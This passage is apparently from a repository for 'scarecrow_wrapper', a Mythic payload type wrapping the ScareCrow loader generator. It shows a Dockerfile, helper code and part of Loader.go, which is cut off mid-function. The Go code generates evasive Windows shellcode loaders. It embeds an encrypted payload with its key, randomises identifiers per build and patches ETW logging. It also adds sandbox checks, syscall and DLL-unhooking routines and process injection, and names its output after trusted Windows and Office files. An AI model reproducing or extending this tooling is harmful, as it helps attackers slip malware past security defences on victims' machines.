├── .gitignore ├── C2_Profiles └── .keep ├── Payload_Type ├── .keep └── scarecrow_wrapper │ ├── Dockerfile │ ├── agent_code │ ├── README.md │ └── ScareCrow │ │ ├── .DS_Store │ │ ├── Cryptor │ │ └── Cryptor.go │ │ ├── LICENSE │ │ ├── Loader │ │ └── Loader.go │ │ ├── README.md │ │ ├── ScareCrow │ │ ├── ScareCrow.go │ │ ├── Screenshots │ │ ├── File_Attributes.png │ │ ├── PreRefreshed_Dlls.png │ │ ├── Refreshed_Dlls.png │ │ └── ScareCrow.png │ │ ├── Struct │ │ └── Struct.go │ │ ├── Utils │ │ └── Utils.go │ │ ├── go.mod │ │ ├── go.sum │ │ ├── limelighter │ │ └── limelighter.go │ │ └── main.json │ └── mythic │ ├── agent_functions │ ├── __init__.py │ └── builder.py │ ├── mythic_service.py │ ├── payload_service.sh │ └── rabbitmq_config.json ├── README.md ├── agent_icons └── .keep ├── config.json ├── documentation-c2 └── .keep ├── documentation-payload └── .keep └── documentation-wrapper └── .keep /.gitignore: -------------------------------------------------------------------------------- 1 | __pycache__/ 2 | *.py[cod] 3 | # Sphinx documentation 4 | docs/_build/ 5 | # Environments 6 | .env 7 | .venv 8 | env/ 9 | venv/ 10 | ENV/ 11 | env.bak/ 12 | venv.bak/ 13 | # pycharm 14 | .idea/ 15 | # ssl certs 16 | ssl/ 17 | # Mythic files 18 | files/ 19 | mythic_access.* 20 | postgres-docker/database/ 21 | rabbitmq-docker/storage/ 22 | display_output.txt 23 | ## Ignore Visual Studio temporary files, build results, and 24 | ## files generated by popular Visual Studio add-ons. 
25 | ## 26 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 27 | 28 | # User-specific files 29 | *.suo 30 | *.user 31 | *.userosscache 32 | *.sln.docstates 33 | 34 | # User-specific files (MonoDevelop/Xamarin Studio) 35 | *.userprefs 36 | 37 | # Build results 38 | [Dd]ebug/ 39 | [Dd]ebugPublic/ 40 | [Rr]elease/ 41 | [Rr]eleases/ 42 | x64/ 43 | x86/ 44 | bld/ 45 | [Bb]in/ 46 | [Oo]bj/ 47 | [Ll]og/ 48 | 49 | # Visual Studio 2015/2017 cache/options directory 50 | .vs/ 51 | # Uncomment if you have tasks that create the project's static files in wwwroot 52 | #wwwroot/ 53 | 54 | # Visual Studio 2017 auto generated files 55 | Generated\ Files/ 56 | 57 | # MSTest test Results 58 | [Tt]est[Rr]esult*/ 59 | [Bb]uild[Ll]og.* 60 | 61 | # NUNIT 62 | *.VisualState.xml 63 | TestResult.xml 64 | 65 | # Build Results of an ATL Project 66 | [Dd]ebugPS/ 67 | [Rr]eleasePS/ 68 | dlldata.c 69 | 70 | # Benchmark Results 71 | BenchmarkDotNet.Artifacts/ 72 | 73 | # .NET Core 74 | project.lock.json 75 | project.fragment.lock.json 76 | artifacts/ 77 | **/Properties/launchSettings.json 78 | 79 | # StyleCop 80 | StyleCopReport.xml 81 | 82 | # Files built by Visual Studio 83 | *_i.c 84 | *_p.c 85 | *_i.h 86 | *.ilk 87 | *.meta 88 | *.obj 89 | *.iobj 90 | *.pch 91 | *.pdb 92 | *.ipdb 93 | *.pgc 94 | *.pgd 95 | *.rsp 96 | *.sbr 97 | *.tlb 98 | *.tli 99 | *.tlh 100 | *.tmp 101 | *.tmp_proj 102 | *.log 103 | *.vspscc 104 | *.vssscc 105 | .builds 106 | *.pidb 107 | *.svclog 108 | *.scc 109 | 110 | # Chutzpah Test files 111 | _Chutzpah* 112 | 113 | # Visual C++ cache files 114 | ipch/ 115 | *.aps 116 | *.ncb 117 | *.opendb 118 | *.opensdf 119 | *.sdf 120 | *.cachefile 121 | *.VC.db 122 | *.VC.VC.opendb 123 | 124 | # Visual Studio profiler 125 | *.psess 126 | *.vsp 127 | *.vspx 128 | *.sap 129 | 130 | # Visual Studio Trace Files 131 | *.e2e 132 | 133 | # TFS 2012 Local Workspace 134 | $tf/ 135 | 136 | # Guidance Automation Toolkit 137 | *.gpState 138 | 139 | # 
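ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
*.DotSettings.user

# vscode
.vscode/
--------------------------------------------------------------------------------
/C2_Profiles/.keep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/C2_Profiles/.keep
--------------------------------------------------------------------------------
/Payload_Type/.keep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/Payload_Type/.keep
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/Dockerfile:
--------------------------------------------------------------------------------
# Build image for the scarecrow_wrapper Mythic payload type: the Mythic Python
# payload base image plus the native tooling the wrapper shells out to
# (mingw-w64 cross compiler, osslsigncode/openssl) and a Go toolchain.
# NOTE(review): the base image is pinned by tag only; pinning by digest
# (FROM image@sha256:...) makes the build reproducible and tamper-evident —
# take the digest from the registry before switching.
FROM itsafeaturemythic/python38_payload:0.0.7

# --no-install-recommends keeps the image small; the apt lists are removed in
# the same layer so stale package metadata is not baked into the image.
RUN apt-get update \
 && apt-get install -y --no-install-recommends osslsigncode openssl mingw-w64 wget \
 && rm -rf /var/lib/apt/lists/*

WORKDIR /tmp

# Go toolchain. GO_VERSION defaults to the release the project has been built
# with (1.14 — an old release that no longer receives fixes upstream; raise it
# once go.mod allows). GO_TARBALL_SHA256 is the expected SHA-256 of the
# tarball: when it is set the download is verified before extraction, so a
# corrupted or tampered archive fails the build instead of being installed.
# Supply it from the checksum published on the Go downloads page, e.g.
#   docker build --build-arg GO_TARBALL_SHA256=<sha256 from the Go downloads page> .
# Left empty, the check is skipped, which matches the previous unverified behaviour.
ARG GO_VERSION=1.14
ARG GO_TARBALL_SHA256=""
RUN set -eu; \
    tarball="go${GO_VERSION}.linux-amd64.tar.gz"; \
    wget -q "https://storage.googleapis.com/golang/${tarball}"; \
    if [ -n "${GO_TARBALL_SHA256}" ]; then \
        echo "${GO_TARBALL_SHA256}  ${tarball}" | sha256sum -c -; \
    fi; \
    tar -C /usr/local -xzf "${tarball}"; \
    rm -f "${tarball}"
RUN ln -s /usr/local/go/bin/go /usr/bin/go
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/agent_code/README.md:
--------------------------------------------------------------------------------
ScareCrow version 2.3
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/.DS_Store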
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Cryptor/Cryptor.go:
--------------------------------------------------------------------------------
// Package Cryptor holds the small byte/string helpers the generator uses:
// PKCS#7 padding, a crypto/rand buffer, and math/rand based identifier names.
package Cryptor

import (
	"bytes"
	"crypto/rand"
	"encoding/hex"
	"errors"
	"fmt"
	"log"
	crand "math/rand"
	"time"
)

// letters is the alphabet RandStringBytes draws from: ASCII letters only, so
// every result is usable as (part of) a Go identifier.
const letters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

// Sentinel errors for Pkcs7Pad. ErrInvalidPKCS7Padding is exported for callers
// but nothing in this file returns it.
var (
	ErrInvalidBlockSize = errors.New("[-] Invalid Blocksize")

	ErrInvalidPKCS7Data = errors.New("[-] Invalid PKCS7 Data (Empty or Not Padded)")

	ErrInvalidPKCS7Padding = errors.New("[-] Invalid Padding on Input")
)

// Pkcs7Pad returns a copy of b padded to a multiple of blocksize with PKCS#7
// padding: between 1 and blocksize bytes are appended, each holding the pad
// length, so an input that already fills a block gains a whole extra block.
// It returns ErrInvalidBlockSize for blocksize <= 0 and ErrInvalidPKCS7Data
// for empty input; b itself is never modified.
func Pkcs7Pad(b []byte, blocksize int) ([]byte, error) {
	switch {
	case blocksize <= 0:
		return nil, ErrInvalidBlockSize
	case len(b) == 0:
		return nil, ErrInvalidPKCS7Data
	}
	padLen := blocksize - len(b)%blocksize
	padding := bytes.Repeat([]byte{byte(padLen)}, padLen)
	padded := make([]byte, 0, len(b)+padLen)
	padded = append(padded, b...)
	return append(padded, padding...), nil
}

// RandomBuffer returns size bytes read from crypto/rand. A read failure is
// fatal (log.Fatal), so callers never receive a partially filled buffer.
func RandomBuffer(size int) []byte {
	out := make([]byte, size)
	if _, err := rand.Read(out); err != nil {
		log.Fatal(err)
	}
	return out
}

// RandStringBytes returns n characters drawn from letters with math/rand.
// The generator is seeded by VarNumberLength/GenerateNumer, not here, and
// math/rand is not a cryptographic source: this is for names, not secrets.
func RandStringBytes(n int) string {
	out := make([]byte, n)
	for pos := 0; pos < n; pos++ {
		out[pos] = letters[crand.Intn(len(letters))]
	}
	return string(out)
}

// VarNumberLength returns a random letter string whose length lies in
// [min, max). The length comes from GenerateNumer, which reseeds math/rand
// from the clock on every call; max must be greater than min or Intn panics.
func VarNumberLength(min, max int) string {
	return RandStringBytes(GenerateNumer(min, max))
}

// printHexOutput prints each buffer as a lowercase hex string, one per line.
// Nothing in this file calls it.
func printHexOutput(input ...[]byte) {
	for _, chunk := range input {
		fmt.Println(hex.EncodeToString(chunk))
	}
}

// GenerateNumer returns a pseudo-random int in [min, max). It reseeds
// math/rand with time.Now().UnixNano() on every call, so calls closer together
// than the clock's resolution can return the same value; max must exceed min.
func GenerateNumer(min, max int) int {
	crand.Seed(time.Now().UnixNano())
	return min + crand.Intn(max-min)
}
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2021 Optiv Security

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Loader/Loader.go:
--------------------------------------------------------------------------------
// Package Loader renders the Go source of the generated artefact from the
// text/template strings supplied by package Struct. Every identifier the
// templates use is looked up in a .Variables map that is filled here with
// random names from Cryptor.VarNumberLength, so each build differs textually.
package Loader

import (
	"ScareCrow/Cryptor"
	"ScareCrow/Struct"
	"ScareCrow/Utils"
	"bufio"
	"bytes"
	"encoding/base64"
	"encoding/hex"
	"fmt"
	"io/ioutil"
	"log"
	"os"
	"strings"
	"text/template"
)

// Template data types. Each carries only the name map the templates address
// as .Variables; the distinct types exist to pair one with each template.

type Binary struct {
	Variables map[string]string
}

type JScript struct {
	Variables map[string]string
}

type JScriptLoader struct {
	Variables map[string]string
}

type SandboxJScript struct {
	Variables map[string]string
}

type ETW struct {
	Variables map[string]string
}

type DLL struct {
	Variables map[string]string
}
type WindowsVersion struct {
	Variables map[string]string
}
type Sandboxfunction struct {
	Variables map[string]string
}
type Sandbox_DomainJoined struct {
	Variables map[string]string
}
type HTALoader struct {
	Variables map[string]string
}
type Macro struct {
	Variables map[string]string
}

// buffer is the package-level scratch buffer DLLfile renders templates into.
// ETW_Buff and Binaryfile declare a local buffer of the same name that shadows
// it, so only DLLfile touches this one.
var (
	buffer bytes.Buffer
)

// FileName picks a base name from a fixed per-mode list and returns
// (name, name+extension). Each list is indexed with
// Cryptor.GenerateNumer(0, n), which yields a value in [0, n).
// NOTE(review): wscript holds 9 entries but is indexed from [0, 10), so a draw
// of 9 is out of range; dllname holds 10 entries but only [0, 9) is used.
// An unrecognised mode returns two empty strings.
func FileName(mode string) (string, string) {
	var filename string
	var name string
	wscript := []string{"APMon", "bisrv", "btpanui", "certcli", "cmdext", "httpapi", "libcrypto", "netlogon", "tcpmon"}
	dllname := []string{"apphelp", "bcryptprimitives", "cfgmgr32", "combase", "cryptsp", "dpapi", "sechost", "schannel", "urlmon", "win32u"}
	cplname := []string{"appwizard", "bthprop", "desktop", "netfirewall", "FlashPlayer", "hardwarewiz", "inetcontrol", "control", "irprop", "game", "inputs", "mimosys", "ncp", "power", "speech", "system", "Tablet", "telephone", "datetime", "winsec"}
	officename := []string{"Timesheet", "Reports", "Zoom", "Updates", "Calculator", "Calendar", "Memo", "Desk", "Appwiz"}
	Binaryname := []string{"Excel", "Word", "Outlook", "Powerpnt", "lync", "cmd", "OneDrive", "OneNote"}

	if mode == "excel" {
		name = officename[Cryptor.GenerateNumer(0, 9)]
		filename = name + ".xll"
	}
	if mode == "control" {
		name = cplname[Cryptor.GenerateNumer(0, 20)]
		filename = name + ".cpl"
	}
	if mode == "wscript" {
		name = wscript[Cryptor.GenerateNumer(0, 10)]
		filename = name + ".dll"
	}

	if mode == "dll" {
		name = dllname[Cryptor.GenerateNumer(0, 9)]
		filename = name + ".dll"
	}

	if mode == "msiexec" {
		name = dllname[Cryptor.GenerateNumer(0, 9)]
		filename = name + ".dll"
	}
	if mode == "binary" {
		name = Binaryname[Cryptor.GenerateNumer(0, 8)]
		filename = name + ".exe"
	}
	return name, filename
}

// ETW_Buff renders Struct.ETW_Function() with a fresh set of random names and
// returns the rendered source together with the name stored under
// Variables["ETW"], which DLLfile turns into a call expression. Template parse
// or execute failures are fatal. The local buffer shadows the package one.
func ETW_Buff() (string, string) {
	var buffer bytes.Buffer
	ETW := &ETW{}
	ETW.Variables = make(map[string]string)
	ETW.Variables["procWriteProcessMemory"] = Cryptor.VarNumberLength(4, 9)
	ETW.Variables["procEtwNotificationRegister"] = Cryptor.VarNumberLength(4, 9)
	ETW.Variables["procEtwEventRegister"] = Cryptor.VarNumberLength(4, 9)
	ETW.Variables["procEtwEventWriteFull"] = Cryptor.VarNumberLength(4, 9)
	ETW.Variables["errnoErr"] = Cryptor.VarNumberLength(4, 9)
	ETW.Variables["WriteProcessMemory"] = Cryptor.VarNumberLength(4, 9)
	ETW.Variables["hProcess"] = Cryptor.VarNumberLength(4, 9)
	ETW.Variables["lpBaseAddress"] = Cryptor.VarNumberLength(4, 9)
	ETW.Variables["lpBuffer"] = Cryptor.VarNumberLength(4, 9)
	ETW.Variables["nSize"] = Cryptor.VarNumberLength(4, 9)
	ETW.Variables["lpNumberOfBytesWritten"] = Cryptor.VarNumberLength(4, 9)
	ETW.Variables["ETW"] = Cryptor.VarNumberLength(4, 9)
	ETW.Variables["handle"] = Cryptor.VarNumberLength(4, 9)
	ETW.Variables["dataAddr"] = Cryptor.VarNumberLength(4, 9)
	ETW.Variables["i"] = Cryptor.VarNumberLength(4, 9)
	ETW.Variables["data"] = Cryptor.VarNumberLength(4, 9)
	ETW.Variables["nLength"] = Cryptor.VarNumberLength(4, 9)
	ETW.Variables["datalength"] = Cryptor.VarNumberLength(4, 9)

	buffer.Reset()
	ETWTemplate, err := template.New("ETW").Parse(Struct.ETW_Function())
	if err != nil {
		log.Fatal(err)
	}
	buffer.Reset()
	if err := ETWTemplate.Execute(&buffer, ETW); err != nil {
		log.Fatal(err)
	}
	return buffer.String(), ETW.Variables["ETW"]
}

// DLLfile renders the source of the DLL-shaped artefact and returns it as a
// string. It fills DLL.Variables with random identifier names plus the
// caller-supplied values — the base64 ciphertext (split via Utils.B64ripper)
// and the base64 key and IV, which are written into the generated source
// verbatim under "key" and "iv" — then, in order: renders the two Sandbox
// templates when sandbox is set, renders the ETW template when ETW is set,
// chooses the WindowsVersion/DLL template pair from refresher and
// ProcessInjection, sets ExportName from mode, and executes the DLL template.
// All template errors are fatal. The name parameter is not used in this body.
// NOTE(review): the first Sandbox Execute below writes into the package-level
// buffer without a preceding Reset, and the final Execute leaves its output in
// that buffer; if DLLfile is ever called twice in one process the earlier
// output would be prepended to Sandboxfunction — confirm against the callers.
func DLLfile(b64ciphertext string, b64key string, b64iv string, mode string, refresher bool, name string, sandbox bool, ETW bool, ProcessInjection string) string {
	var LoaderTemplate, DLLStructTemplate string
	DLL := &DLL{}
	DLL.Variables = make(map[string]string)
	Sandboxfunction := &Sandboxfunction{}
	Sandboxfunction.Variables = make(map[string]string)
	Sandbox_DomainJoined := &Sandbox_DomainJoined{}
	Sandbox_DomainJoined.Variables = make(map[string]string)
	WindowsVersion := &WindowsVersion{}
	WindowsVersion.Variables = make(map[string]string)

	DLL.Variables["fullciphertext"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["ciphertext"] = Utils.B64ripper(b64ciphertext, DLL.Variables["fullciphertext"], true)
	DLL.Variables["key"] = b64key
	DLL.Variables["iv"] = b64iv
	DLL.Variables["vkey"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["viv"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["block"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["decrypted"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["mode"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["vciphertext"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["rawdata"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["stuff"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["raw_bin"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["hexdata"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["PKCS5UnPadding"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["length"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["src"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["unpadding"] = Cryptor.VarNumberLength(4, 12)

	// Several keys below are assigned more than once (e.g. "ptr", "handle",
	// "regionsize", "hexdata"); only the last assignment reaches the template.
	DLL.Variables["ptr"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["buff"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["virtualAlloc"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["alloc"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["phandle"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["baseA"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["zerob"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["alloctype"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["protect"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["regionsizep"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["regionsize"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["WQRH"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["xx"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["yy"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["Versionfunc"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["k"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["Version"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["MV"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["MinV"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["customsyscall"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["customsyscallVP"] = Cryptor.VarNumberLength(4, 12)

	DLL.Variables["syscallnumber"] = Cryptor.VarNumberLength(4, 12)

	DLL.Variables["loc"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["dll"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["error"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["x"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["file"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["loaddll"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["handle"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["dllBase"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["dllOffset"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["old"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["mem"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["oldptrperms"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["ptr"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["shellcode"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["oldshellcodeperms"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["loader"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["hexdata"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["VirtualProtect"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["procVirtualProtect"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["Reloading"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["bytes"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["getWin"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["showWin"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["hwnd"] = Cryptor.VarNumberLength(4, 12)

	DLL.Variables["oldfartcodeperms"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["regionsize"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["runfunc"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["handle"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["NewProtect"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["oldprotect"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["baseAddress"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["regionSize"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["processHandle"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["handlez"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["syscall"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["syscallnumber"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["NtProtectVirtualMemory"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["sysid"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["bytesdata"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["locdata"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["xdata"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["dllBasedata"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["dllOffsetdata"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["memdata"] = Cryptor.VarNumberLength(4, 12)

	DLL.Variables["CreateProcess"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["GetModuleInformation"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["ReloadRemoteProcess"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["RemoteModuleReloading"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["Target"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["WriteProcessMemory"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["addr"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["buf"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["bytes"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["commandLine"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["data"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["dll"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["dllBase"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["dllOffset"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["err"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["file"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["funcNtAllocateVirtualMemory"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["funcNtCreateThreadEx"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["funcNtProtectVirtualMemory"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["funcNtWriteVirtualMemory"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["hModule"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["hProcess"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["handle"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["handleSize"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["hh"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["lpBaseAddress"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["lpBuffer"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["lpNumberOfBytesWritten"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["mi"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["MI"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["mod"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["modules"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["module"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["nLength"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["nSize"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["name"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["needed"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["n"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["offsetaddr"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["oldProtect"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["outString"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["pi"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["procEnumProcessModules"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["EnumProcessModules"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["procGetModuleBaseName"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["GetModuleBaseName"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["procGetModuleInformation"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["procWriteProcessMemory"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["process"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["rawbytes"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["raw_bin"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["regionsize"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["s"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["shellcode"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["si"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["size"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["startupInfo"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["x"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["PROCESS_ALL_ACCESS"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["errnoERROR_IO_PENDING"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["errERROR_IO_PENDING"] = Cryptor.VarNumberLength(4, 12)
	DLL.Variables["customsyscall"] = Cryptor.VarNumberLength(4, 12)

	// Sandbox templates are rendered into the shared package buffer; the
	// second render is preceded by a Reset, the first is not (see note above).
	if sandbox == true {
		DLL.Variables["IsDomainJoined"] = Cryptor.VarNumberLength(4, 12)
		DLL.Variables["domain"] = Cryptor.VarNumberLength(4, 12)
		DLL.Variables["status"] = Cryptor.VarNumberLength(4, 12)
		SandboxFunctionTemplate, err := template.New("Sandboxfunction").Parse(Struct.Sandbox())
		if err != nil {
			log.Fatal(err)
		}
		if err := SandboxFunctionTemplate.Execute(&buffer, DLL); err != nil {
			log.Fatal(err)
		}
		DLL.Variables["Sandboxfunction"] = buffer.String()
		DLL.Variables["checker"] = Cryptor.VarNumberLength(4, 12)
		Sandbox_DomainJoinedTemplate, err := template.New("Sandbox_DomainJoined").Parse(Struct.Sandbox_DomainJoined())
		buffer.Reset()
		if err != nil {
			log.Fatal(err)
		}
		if err := Sandbox_DomainJoinedTemplate.Execute(&buffer, DLL); err != nil {
			log.Fatal(err)
		}
		DLL.Variables["Sandbox"] = buffer.String()
		buffer.Reset()
	} else {
		DLL.Variables["Sandbox"] = ""
		DLL.Variables["Sandboxfunction"] = ""
		DLL.Variables["SandboxImport"] = ""
	}

	// The WindowsVersion template shares these four names with the DLL template.
	WindowsVersion.Variables["Version"] = DLL.Variables["Version"]
	WindowsVersion.Variables["syscall"] = DLL.Variables["syscall"]
	WindowsVersion.Variables["customsyscall"] = DLL.Variables["customsyscall"]
	WindowsVersion.Variables["customsyscallVP"] = DLL.Variables["customsyscallVP"]

	buffer.Reset()
	// Inside this block ETW is a new string (the generated function name) that
	// shadows the bool parameter; "()" turns it into a call expression.
	if ETW == true {
		ETW_Function, ETW := ETW_Buff()
		DLL.Variables["ETW"] = ETW + "()"
		DLL.Variables["ETW_Function"] = ETW_Function
	} else {
		DLL.Variables["ETW"] = ""
		DLL.Variables["ETW_Function"] = ""
	}
	// Note the pairing: refresher == false selects the *_Refresher templates.
	if refresher == false {
		LoaderTemplate = Struct.WindowsVersion_DLL_Refresher()
